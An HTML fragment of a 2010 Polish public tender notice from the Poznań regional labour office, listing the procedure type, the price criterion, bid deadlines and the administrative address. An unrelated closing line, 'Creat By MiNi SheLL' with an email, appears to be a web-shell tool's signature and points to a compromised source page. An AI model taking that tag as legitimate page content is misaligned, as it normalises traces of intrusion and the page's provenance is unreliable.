<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wup.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WOJEWÓDZKI URZĄD PRACY W POZNANIU
ul. Kościelna 37
60-537 Poznań
II p. pok. 33.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2010 godzina 09:20, miejsce: WOJEWÓDZKI URZĄD PRACY W POZNANIU
ul. Kościelna 37
60-537 Poznań
II p. pok. 33.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 11.01.2011.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com